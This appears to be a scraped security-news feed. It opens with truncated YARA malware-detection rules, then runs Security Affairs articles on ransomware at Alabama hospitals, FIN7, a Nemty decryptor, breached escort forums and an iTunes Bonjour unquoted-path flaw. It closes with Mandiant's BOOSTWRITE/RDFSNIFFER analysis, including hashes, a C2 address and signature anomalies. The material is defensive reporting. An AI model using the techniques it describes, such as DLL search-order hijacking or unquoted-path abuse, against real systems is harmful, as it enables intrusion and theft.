      $x1 = "c:\\Users\\User\\Desktop\\2003\\Efential\\Release\\EFENTIAL.pdb" fullword ascii
      $s2 = "EFENTIAL.exe" fullword ascii
      $s3 = "ZNtlsIkbp2bxIIBXLbRtd3e85g7mJ73gSFPnybocDj/xsKVPWxzllXY/FdB150/ewzkkdzDw5VMbiVfS/SPd0FlXp+VqpDpPDXxNH3cc9TXXa53EGeMfGnsPa3chxKVv" ascii
      $s4 = "tblJgbnpgZmZCaHxmfEpoaS9Cb31DfHpZfVJobW5SYG56YGZmQmh8ZnxKaGkvQm99Q3x6WX1SaG1uUmBuemBmZkJofGZ8SmhpL0JvfUN8ell9UmhtblJgbnpgZmZCaHx" ascii /* base64 encoded string 'nR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|' */
      $s5 = "C9813Hcfx1BkY3VrYVwfB4tWs+/Eb93UVwdvrbdywicNqMdPSiMzJFXbZbSLG6cDA/O9Vy2ob3d3PeVLcie95EpT50oKkSE/8bynT1sLOWCoPxXUd+dPO6BKhHcwzOdT" ascii
      $s6 = "G+MfTPu8J3chkKdvVwmN7R/fNdx3H8cxWUFva2FcHweLIPfrnG/d1FcHb/FxEOQnDajHT0qu26c122W0ixunZpkE2lctqG93dy4Z7jMnveRKU+dp33WJP/G8p09bPG/N" ascii
      $s7 = "RSVloG9h6HM56NP1tCMFZKs69gEEW+JoiOCz9U3uI3uYsb+mL2+97Wf903wpFDCKiBjjtt/TznbwXOcnHS87rh7rG4N2wHiRqPj2AReKM+CICO5NSlNOxut2wHOnb5dY" ascii
      $s8 = "iOC7W7cnZWhtQTw5nu3bSa/eHxvVFB3RfZP9CFkKs3KWazNkXJPk+HTPmTvpWFcnpLn2DUFtp2v1ELP9acqRoKOXIXMJCNtYpiEdTEP7nzdBU8UoA538OfhEk+kUzQrb" ascii
      $s9 = "6RzgkjSOWDNk6FtXIb1gBQ0oTx93sMelCVJYrG9ZEJB07FiwoYhZkKiSkNh3DQweyOCz9UXEmKjkHOXYfeRY2qT4p4UUBtCIA0+o00Fj/JSM4I+AkgRrpYTr7rS9V9wV" ascii
      $s10 = "StOEJiPbZbiKG6dLTcWrVy28bnd3MRHI6Se9+EtT5xnfnbI/8aimT1vHvvS1PxXYdudP5QazN3cw+OZTG6WMoPkj3ehaV6ftpUvyTw1ETh9335+9tGudzBrjH0t/zLV3" ascii
      $s11 = "mQOhiAgYsPyI4DhFgdYtLdGQ1W9Bxmd6m3lnTJcfr4gYGLD8iOA41oOuIaXdCNnnTaphWJ1HYWqR+qqIKBiwmIjgOPiFFCgT1NbQLUTYb0KTUW+UkPeoybBtiGSwewAX" ascii
      $s12 = "Jd812HQfx5Qv5tVrYSAcB4t1CVi1b93QVAdvpSmDyCcNpMRPSpcCbzzbZbCIG6fu/FMSVy20bHd3ShSspye94ElT56m+fUo/8bCkT1t+Me1nPxXQdOdPGL1DQHcw8ORT" ascii
      $s13 = "f64odyFEoG9XrrnC4d81EHAfx9MLlPdrYegYB4s9h95Cb91oUAdvuYg3nCcNHMBPSk5z9mnbZfiNG6fklZhYVy38aXd3FwtmSie9uExT54d2bFE/8eihT1swM44GPxWY" ascii
      $s14 = "G5WtAP8+00dbvQhs6PgZzXSo8WjM1YD2S2wk9prpUJn8oG0I4laYrNKGZTi4kPTVMKbGcImVZllhx5Tj+amkWDhXp2+bKhvFcO9Gasz1gDixo1+XH24Fpyq/01X5aw0b" ascii
      $s15 = "3ie9qEhT593fXyw/8filT1s1hgetPxWodedPR5foK3cwiOVTG/Eyi+Yj3ZhZV6cVyoNtTw00TR93mxbYI2udnBnjHxLYp+x3IZylb1e4qIYS3zXYdR/HAZflQmthIB0H" ascii
      $s16 = "RpFqNpYQapubxqPNu6yDXrsXC6qB7CzF0GzVj0FjbT6RdW15ncWnY7/vh92xHgE5j7MjB9mZ3mVK5FiwlKhYoKj4kIq4A4DduIQLc4bcLK/RsNUFQeBu9pLlbsmemKY/" ascii
      $s17 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii
      $s18 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii
      $s19 = "iBunjDe9gVct7Gx3d65SQF8nvahJU+cRqKveP/H4pE9bLL3YAz8VqHTnT7v1JHR3MIjkUxv0uwvjI92YWFenoW2yzU8NNEwfd/JCOHlrnZwY4x9adVfbdyGcpG9X8DDB" ascii
      $s20 = "pKjTapsqZ36hVbhZOPU4sD5ekeEYE2WaixuncUK41ZSfp87TA/3tI91r1DvwoBcDoQywknwbTexd6FjAV+2Ac8gY7SPda9RPwKByrBsJvAE05AhPsWyl0KilUwtkCFjk" ascii
      uint16(0) == 0x5a4d and filesize < 800KB and
      ( pe.imphash() == "ffcd1ab4ae5e052202d6af1ea2767498" or ( 1 of ($x*) or 4 of them ) )

      date = "2019-10-13"
      hash1 = "6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7"
      $x1 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide
      $x2 = "Customer50041 Keeling Bypass, North Christellefort, Tunisia Global128 Manuel Stravenue, New Nicholasfort, Montserrat" fullword ascii
      $x3 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide
      $x4 = "Forward297 German Trail, West Miloshire, Germany Product44796 Chesley Bypass, East Santos, Antigua and Barbudan" fullword ascii
      $x5 = "Regional1198 Rahsaan Motorway, Klockoburgh, Czech Republic Human326 Olson Bypass, North Nicholaus, Zimbabwe" fullword ascii
      $x6 = "Dynamic6743 Hickle Bypass, West Karliborough, United States Minor Outlying Islands Product6344 Zieme Inlet, Gloverfurt, Taiwan" fullword ascii
      $x7 = "*\\G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd#Microsoft Forms" wide
      $s8 = "Central080 Ari Ranch, Port Sarinachester, Saint Vincent and the Grenadines Product4773 Cornelius Ford, Maybelleville, Morocco" fullword ascii
      $s9 = "Senior75970 Kiehn Brook, Port Joaquin, Comoros Forward6656 Parker Extension, Halvorsonton, Zambia" fullword ascii
      $s10 = "6868686868686868686868" ascii /* reversed goodware string '8686868686868686868686' */ /* hex encoded string 'hhhhhhhhhhh' */
      $s11 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
      $s12 = "Dynamic98251 Karli Mission, Deronhaven, Democratic People's Republic of Korea Chief1365 Hermann Passage, Rickyport, Oman24 " fullword ascii
      $s13 = "Forward0973 Nienow Dam, Walkermouth, Egypt Customer976 MacGyver Mountain, Schoentown, Northern Mariana Islands+ Lo " fullword ascii
      $s14 = "Corporate28089 Etha Bypass, Jastbury, Turkmenistan Dynamic764 Price Cliffs, Welchtown, Algeriaog(1 " fullword ascii
      $s15 = "National4629 Brianne Locks, Port Shadburgh, Bangladesh Forward481 Ashton Course, Lake Judson, Pakistana Pr" fullword ascii
      $s16 = "Forward563 Sasha Mountains, Nitzschestad, Palau Lead58549 Lesch Parkways, Port Archburgh, Burundi" fullword ascii
      $s17 = "Forward00009 Labadie Valley, Lake Othaview, Brunei Darussalam Future796 Fritsch Road, Mertzchester, Montserrat1831 " fullword ascii
      $s18 = "Central9007 Leland Isle, Laurynview, Morocco Product75313 Mueller Harbors, West Nakiafort, Lithuania+ Log( " fullword ascii
      $s19 = "Regional973 Aubrey Squares, South Simoneville, Svalbard & Jan Mayen Islands Dynamic7842 Madilyn Course, O'Harastad, Armenia" fullword ascii
      $s20 = "Lead7617 Nicolas Meadows, West Odell, Saint Pierre and Miquelon Product9412 Stamm Cove, South Katlynnport, Comoros " fullword ascii
      uint16(0) == 0xcfd0 and filesize < 900KB and
      1 of ($x*) and 4 of them

Alabama Hospital chain paid ransom to resume operations after ransomware attack

An Alabama hospital chain announced to have restored normal operation after paying the ransom request by crooks that infected its systems with ransomware.

A hospital chain in west Alabama was recently hit by a ransomware attack that paralyzed its systems. The organization opted out to pay the ransom and announced to have restored normal operation.

The hospital chain hasn’t revealed the amount it has paid to the crooks to decrypt the data, it seems that an insurance covered the cost.

Recently I reported that several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure. At the time, a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, revealed that the infrastructures had limited access to their computing systems.

“The DCH Health System said its hospitals in the west Alabama cities of Tuscaloosa, Northport and Fayette resumed admitting patients Thursday, and its imaging and patient scheduling services were going back online Friday.” reads the post published by the Associated Press.

The operations at the hospitals were severely impacted for 10 days during which the hospitals kept treating people, but new patients were sent to other hospitals in Birmingham or Mississippi.

“We had to gain access to our system quickly and gain the information it was blocking,” chief operating officer Paul Betz told a news conference. “As time goes by, and we determine the full impact of this, we will be very grateful we had cyber insurance in place.”

The systems at the hospitals have been infected with a variant of the Ryuk ransomware, internal staff reverted to using paper files.

“A statement from the system said workers were still restoring some nonessential systems including email and were trying to get programs operating at full speed.” continues the post.

The three hospitals admitted more than 32,000 patients last year.

A few weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)

The post Alabama Hospital chain paid ransom to resume operations after ransomware attack appeared first on Security Affairs.

Security Affairs newsletter Round 235

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Hacker is auctioning a database containing details of 92 million Brazilians
Iran-linked Phosphorus group hit a 2020 presidential campaign
UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities
D-Link router models affected by remote code execution issue that will not be fixed
Data from Sephora and StreetEasy data breaches added to HIBP
PoS malware infections impacted four restaurant chains in the U.S.
US will help Baltic states to secure baltic energy grid
Developer hacked back Muhstik ransomware crew and released keys
Experts found a link between a Magecart group and Cobalt Group
Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild
MS October 2019 Patch Tuesday updates address 59 flaws
Users reported problems with patches for CVE-2019-1367 IE zero-day
Hackers compromised Volusion infrastructure to siphon card details from thousands of sites
Multiple APT groups are exploiting VPN vulnerabilities, NSA warns
Researchers discovered a code execution flaw in NSA GHIDRA
Twitter inadvertently used Phone Numbers collected for security for Ads
vBulletin addresses three new high-severity vulnerabilities
Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware
Attor malware was developed by one of the most sophisticated espionage groups
iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware
Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012
SAP October 2019 Security Patch Day fixes 2 critical flaws
Tor Project is going to remove End-Of-Life relays from the network
Hacker breached escort forums in Italy and the Netherlands and is selling user data
Researchers released a free decryptor for the Nemty Ransomware
Sophos fixed a critical vulnerability in Cyberoam firewalls
Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics
Top cybersecurity certifications to consider for your IT career
FIN7 Hackers group is back with a new loader and a new RAT
Leafly Cannabis information platform suffered a data leak
SIM cards used in 29 countries are vulnerable to Simjacker attack

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 235 appeared first on Security Affairs.

FIN7 Hackers group is back with a new loader and a new RAT

FireEye Mandiant discovered that the FIN7 hacking group added new tools to its cyber arsenal, including a module to target remote administration software of ATM vendor.

Security experts at FireEye Mandiant discovered that the FIN7 hacking group has added new tools to its arsenal, including a new loader and a module that hooks into the legitimate remote administration software used by the ATM maker NCR Corporation.

The group that has been active since late 2015 targeted businesses worldwide to steal payment card information. Fin7 is suspected to have hit more than 100 US companies, most of them in the restaurant, hospitality, and industries.

In August 2018, three members of the notorious cybercrime gang have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

The new loader is able to drop the malware directly in memory, it was dubbed BOOSTWRITE and allows threat actors to load several malicious codes, including the Carbanak backdoor.

Researchers also spotted a new RAT tracked as RDFSNIFFER that is dropped by the BOOSTWRITE loader.

“The first of FIN7’s new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER.” reads the Mandiant report. “While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.”

BOOSTWRITE implements the DLL search order hijacking technique to load its DLLs into the target’s memory that allows it to download the initialization vector (IV) and the decryption two embedded payload DLLs.

Before decrypting the embedded PE32.DLLs payloads the loader performs sanity checks on the results, then load them into memory.

The researchers analyzed several samples of BOOSTWRITE, one of them that was uploaded to VirusTotal on October 3 was signed with a code signing certificate issued by MANGO ENTERPRISE LIMITED.

fin7 detection

The loader was observed delivering the RDFSNIFFER DLL which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER hooks the process of NCR Corporation’s RDFClient, it runs every time the legitimate software for remote administration is executed on the compromised machines.

The malicious code is designed to run man-in-the-middle attacks on connections made using RDFClient, it also allows attackers to upload, download, execute and/or delete arbitrary files.

Below the list of supported commands:

Command NameLegit Function in RDFClientRDFClient Command IDDescription
UploadFileMgrSendFile107Uploads a file to the remote system
DownloadFileMgrGetFile108Retrieves a file from the remote system
ExecuteRunCommand3001Executes a command on the remote system
DeleteRemoteFileMgrDeleteFile3019Deletes file on remote system
DeleteLocalDeletes a local file

In March, the group carried out attacks delivering a previously unseen malware tracked as SQLRat that drops files and executes SQL scripts on the host. The messages sent to the victims were also dropping the backdoor DNSbot that primarily operates over DNS traffic.

In April 2018, FIN7 hackers stole credit and debit card information from millions of consumers who have purchased goods at Saks Fifth Avenue and Lord & Taylor stores.

“While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements.” concludes the report.

“Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns.”

Pierluigi Paganini

(SecurityAffairs – FIN7, hacking)

The post FIN7 Hackers group is back with a new loader and a new RAT appeared first on Security Affairs.

Researchers released a free decryptor for the Nemty Ransomware

Good news for the victims of the Nemty Ransomware, security researchers have released a free decryptor that could be used to recover files.

I have great news for the victims of the recently discovered Nemty Ransomware, security researchers have released a free decryptor tool that could be used to recover files.

In mid-August, the Nemty ransomware appeared in the threat landscape, the name of the ransomware comes after the extension it adds to the encrypted file names. The malicious code also deletes their shadow copies to make in impossible any recovery procedure.

Below the ransom note dropped by the Nemty ransomware after the encryption process is completed. Attackers demand the payment of a 0.09981 BTC ransom (roughly $1,000) through a portal hosted on the Tor network.

Nemty ransomware

Crooks used multiple attack vectors to distribute the ransomware, according to the popular malware researcher Vitali Kremez, the ransomware is mainly dropped via compromised remote desktop connections.

Now researchers from the security firm Tesorion have developed a decryptor tool that works on Nemty versions 1.4 and 1.6, they also announced a working tool for version 1.5.

The security form is also working with Europol to get its decryptors included in their NoMoreRansom project.

“As 1.6 is the most recent version of the two, we have been focussing our efforts on this version first. We now have a working decryptor for version 1.6. Please contact Tesorion CSIRT to obtain our decryptor for free if you are a victim of Nemty 1.6. We are also finishing our decryptor for Nemty 1.5 and expect to release it soon as well.” reads the post published by Tesorion.

The decryptor currently supports only a limited number of file extensions, anyway, researchers are working to improve it and support other file types.

Tesorion is not allowing victims to generate the decryption keys with their client, instead, it is allowing victims to retrieve the decryption key by generating it on its own servers.

Victims can contact the Tesorion CSIRT and request help with the Nemty Ransomware, in turn the company will then send a link to the decryptor that will allow you to decrypt the files.

“Tesorion told BleepingComputer they went this route in order to prevent the ransomware developers from analyzing the decryptor and learning the weakness in their algorithm.” reported BleepingComputer.

Victims can upload their files on the Tesorion serves that will use it to calculate the decryption key, then the key is sent back to the victims that can load is in the decryptor.

Pierluigi Paganini

(SecurityAffairs – Nemty ransomware, malware)

The post Researchers released a free decryptor for the Nemty Ransomware appeared first on Security Affairs.

Hacker breached escort forums in Italy and the Netherlands and is selling user data

Popular prostitution and escort forums in Italy and the Netherlands have been hacked and data have been offered for sale in the cybercrime underground.

A Bulgarian hacker known as InstaKilla has breached two online escort forums and stole the user information that he is now offering for sale on a hacking forum.

The two escort forums are and, it is used by sex workers and their customers in Italy and the Netherlands, both websites have confirmed the breaches.

Experts reports that also a forum for the Zooville zoophilia and bestiality fans was hacked and data offered for sale.

The Dutch news site NOS revealed that a hacker is selling the Dutch forum database for $300 on online forums. The exposed data includes user names, hashed passwords, and IP addresses for roughly 250,000 members.

The account details of the 250,000 users of the Dutch website have been leaked. This includes e-mail addresses. The website is popular among visitors to prostitutes and escorts, who exchange experiences and tips.” reported the NOS website.

“A hacker has captured the data from the members and offers it for sale, according to a study by the NOS after reporting an anonymous source.”

The hacker is also selling 33,000 records stolen from the Italian forum.

Both escort forums were running outdated versions of the popular vBulletin forum software. At the end of September, an anonymous hacker disclosed technical details and proof-of-concept exploit code for a critical zero-day remote code execution flaw in vBulletin (CVE-2019-16759). A few days later, the security expert Troy Mursch observed a botnet that it utilizing the recently disclosed vBulletin exploit to secure vulnerable servers to avoid that can be compromised by other threat actors. Likely, the Bulgarian hacker has exploited the same flaw to compromise the escort forums that were not updated by their admins.

“According to a sample of the data obtained by ZDNet, in the case of the Dutch forum, the hacker also appears to have gained access to the site’s internal paid subscription system, although there was no financial information included in the sample we received.” reported ZDNet.

InstaKilla is the same hacker who stole data from millions of Bulgarians in July and sent it to local media, the hacker is now offering for sale data from tens of other vBulletin-based forums.

Users of the escort forums are potentially exposed to extortion phishing campaigns similar to what has happened after the Ashley Madison hack.

Pierluigi Paganini

(SecurityAffairs – escort forums, vBulletin)

The post Hacker breached escort forums in Italy and the Netherlands and is selling user data appeared first on Security Affairs.

iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware

The gang behind BitPaymer and ransomware attacks has been found exploiting Windows zero-day for Apple iTunes and iCloud.

The cybercriminals behind BitPaymer and iEncrypt ransomware attacks have been found exploiting a Windows zero-day vulnerability for Apple iTunes and iCloud in attacks in the wild.

The zero-day vulnerability resides in the Bonjour updater that comes packaged with Apple’s iTunes and iCloud software for Windows to evade antivirus detection.

The evasion technique was discovered by researchers at Morphisec while observing an attack against an enterprise in the automotive industry.

“This time we have identified the abuse of an Apple zero-day vulnerability in the Bonjour updater that comes packaged with iTunes for Windows. The Windows exploit is important to note given Apple is sunsetting iTunes for Macs with the release of macOS Catalina this week, while Windows users will still need to rely on iTunes for the foreseeable future.” reads the security advisory published by Morphisec.
“The adversaries abused an unquoted path to maintain persistence and evade detection.”

The Bonjour updater runs in the background and automates multiple tasks, including automatically download the updates for Apple software. Experts pointed out that the Bonjour updater has its own installation entry in the installed software section and a scheduled task to execute the process. This means that even uninstalling iTunes and iCloud doesn’t remove Bonjour updater.

The experts discovered that the Bonjour updater was vulnerable to the unquoted service path vulnerability.

Unquoted search paths are a relatively older vulnerability that occurs when the path to an executable service or program (commonly uninstallers) are unquoted and contain spaces. The spaces can allow someone to place their own executable in the path and get it to be executed instead.

Bonjour was trying to run from the Program Files folder, but due to the unquoted path issue, it instead ran the BitPaymer ransomware that was named Program.

“Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe“. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine.” continues the analysis. “In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.”

bitpaymer campaign

Experts explained that attackers using a legitimate process signed by a trusted vendor, like Bonjour, will be able to execute a new malicious child process evading detection. In this specific attack, security programs have not scanned the malicious payloads because they did not use an extension,

The unquoted service path vulnerability could also be exploited by attackers to escalate privileges.

Morphisec Labs reported their discovery to Apple that released iCloud for Windows 10.7iCloud for Windows 7.14, and iTunes 12.10.1 for Windows to address the vulnerability.

Users that have installed an Apple software on their Windows computer and then uninstalled it, should manually uninstall the Bonjour updater if present.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware appeared first on Security Affairs.

Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques

During several recent incident response engagements, FireEye Mandiant investigators uncovered new tools in FIN7’s malware arsenal and kept pace as the global criminal operators attempted new evasion techniques. In this blog, we reveal two of FIN7’s new tools that we have called BOOSTWRITE and RDFSNIFFER.

The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.

RDFSNIFFER, a payload of BOOSTWRITE, appears to have been developed to tamper with NCR Corporation's “Aloha Command Center” client. NCR Aloha Command Center is a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. The malware loads into the same process as the Command Center process by abusing the DLL load order of the legitimate Aloha utility. Mandiant provided this information to NCR.

BOOSTWRITE Loader: Where You At?

BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

Once loaded, `DWrite.dll` connects to a hard-coded IP and port from which it retrieves a decryption key and initialization vector (IV) to decrypt two embedded payload DLLs. To accomplish this task, the malware first generates a random file name to be used as a text log under the current user's %TEMP% directory; this filename starts with ~rdf and is followed by a set of random numbers. Next, the malware scans its own image to find the location of a 32-byte long multi-XOR key which is used to decode data inside its body. Part of the decoded data is an IP address and port which are used to retrieve the key and the IV for the decryption of the embedded payloads. The encryption algorithm uses the ChaCha stream cipher with a 256-bit key and 64-bit IV.

Once the key and the IV are downloaded the malware decrypts the embedded payloads and performs sanity checks on the results. The payloads are expected to be PE32.DLLs which, if the tests pass, are loaded into memory without touching the filesystem.

The malware logs various plaintext messages to the previously created logfile %TEMP%\~rds<rnd_numbers> which are indicative of the loader’s execution progress. An example of the file content is shown in Figure 1:

Init OK
Key OK
Data: 4606941
HS: 20
K:[32] V:[8]
DCnt: 732642317(ERR)

Figure 1: BOOSTWRITE log file

Before exiting, the malware resolves the location of the benign DWrite.dll library and passes the execution control to its DWriteCreateFactory method.

The malware decrypts and loads two payload DLLs. One of the DLLs is an instance of the CARBANAK backdoor; the other DLL is a tool tracked by FireEye as RDFSNIFFER which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER Module: We Smell a RAT

RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via NCR Corporation’s ‘Aloha Command Center Client’ (RDFClient), an application designed to provide visibility and system management capabilities to remote IT techs. RDFSNIFFER loads into the same process as the legitimate RDFClient by abusing the utility’s DLL load order, launching each time the ‘Aloha Command Center Client’ is executed on an impacted system.

When the RDFSNIFFER module is loaded by BOOSTWRITE it hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface (Table 1). Furthermore, this enables the malware to alter the user’s last input time to ensure application sessions do not time out.

Win32 API Function

Hook Description


Used to man-in-the-middle SSL sessions


Used to man-in-the-middle SSL sessions


Used to man-in-the-middle socket connections


Used to man-in-the-middle socket connections


Used to man-in-the-middle socket connections


Used to hijack the utility's UI


Used to hijack the utility's UI


Used to hijack the utility's UI


Used to hijack the utility's UI


Used to change the user's last input time (to avoid timed lock outs)

Table 1: RDFSNIFFER’s Hooked Win32 API Functions

This module also contains a backdoor component that enables it to inject commands into an active RDFClient session. This backdoor allows an attacker to upload, download, execute and/or delete arbitrary files (Table 2).

Command Name

Legit Function in RDFClient

RDFClient Command ID





Uploads a file to the remote system




Retrieves a file from the remote system




Executes a command on the remote system




Deletes file on remote system




Deletes a local file

Table 2: RDFSNIFFER’s Backdoor Functions

Signed: Yours Truly, FIN7

While the majority of BOOSTWRITE variants recovered from investigations have been unsigned, Mandiant identified a signed BOOSTWRITE sample used by FIN7 during a recent investigation. Following that discovery, a signed BOOSTWRITE sample was uploaded to VirusTotal on October 3. This executable uses a code signing certificate issued by MANGO ENTERPRISE LIMITED (Table 3).








32 7F 8F 10 74 78 42 4A BE B8 2A 85 DC 36 57 03 CC 82 70 5B

Table 3: Code signing certificate used for BOOSTWRITE

This indicates the operators may be actively altering this malware to avoid traditional detection mechanisms. Notably, the signed BOOSTWRITE sample had a 0/68 detection ratio when it was uploaded to VirusTotal, demonstrating the effectiveness of this tactic (Figure 2).

Figure 2: Current VirusTotal detection ratio for signed BOOSTWRITE

Use of a code signing certificate for BOOSTWRITE is not a completely new technique for FIN7 as the group has used digital certificates in the past to sign their phishing documents, backdoors, and later stage tools. By exploiting the trust inherently provided by code certificates, FIN7 increases their chances of bypassing various security controls and successfully compromising victims. The full evasion achieved against the detection engines deployed to VirusTotal – as compared to an unsigned BOOSTWRITE sample with an invalid checksum– illustrates that FIN7’s methods were effective in subverting both traditional detection and ML binary classification engines. This is a known issue and has been deeply studied since at least 2016’s “Chains of Distrust” research and 2017’s “Certified Malware” paper. Since there are plenty of goodware samples with bad or no signatures – and a growing number of malware samples with good signatures – there is no easy solution here. The upside is that vendors selectively deploy engines to VirusTotal (including FireEye) and VT detection performance often isn’t a comprehensive representation of encountering full security technology stacks that implement detection-in-depth. Later in this blog we further explore BOOSTWRITE’s PE Authenticode signature, its anomalies, and how code signing can be turned from a detection challenge into detection opportunities.

Outlook and Implications

While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements. Further, the use of code signing in at least one case highlights the group's judicious use of resources, potentially limiting their use of these certificates to cases where they have been attempting to bypass particular security controls. Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns. As a result, organizations need to remain vigilant and continue to monitor for changes in methods employed by the FIN7 actors.

Sigs Up Dudes! Indicators, Toolmarks, and Detection Opportunities

While FireEye does not release our production detection logic for the code families, this section does contain some identification and hunting concepts that we adopt in our layered detection strategy. Table 4 contains malware samples referenced in this blog that FireEye is able to share from the larger set recovered during active investigations.




MD5: a67d6e87283c34459b4660f19747a306
SHA-1: a873f3417d54220e978d0ca9ceb63cf13ec71f84
SHA-256: 18cc54e2fbdad5a317b6aeb2e7db3973cc5ffb01bbf810869d79e9cb3bf02bd5

C2: 109.230.199[.]227

BOOSTWRITE (unsigned)

MD5: af2f4142463f42548b8650a3adf5ceb2
SHA1: 09f3c9ae382fbd29fb47ecdfeb3bb149d7e961a1
SHA256: 8773aeb53d9034dc8de339651e61d8d6ae0a895c4c89b670d501db8dc60cd2d0

C2: 109.230.199[.]227

Table 4: Publicly-shareable BOOSTWRITE samples

The signed BOOSTWRITE sample has a PE Authenticode anomaly that can be detected using yara’s PE signature module. Specifically, the PE linker timestamp is prior to the Authenticode validity period, as seen in Table 5.



2019-05-20 09:50:55 UTC

Signed BOOSTWRITE’s PE compilation time

2019-05-22 00:00 UTC
2020-05-21 23:59 UTC

Signed BOOSTWRITE’s “mango ENTERPRISE LIMITED” certificate validity window

Table 5: Relevant executabe timestamps

A public example of a Yara rule covering this particular PE Authenticode timestamp anomaly is available in a blog post from David Cannings, with the key logic shown in Figure 3.

pe.number_of_signatures > 0 and not for all i in ( - 1):

Figure 3: Excerpt of NCC Group’s research Yara rule

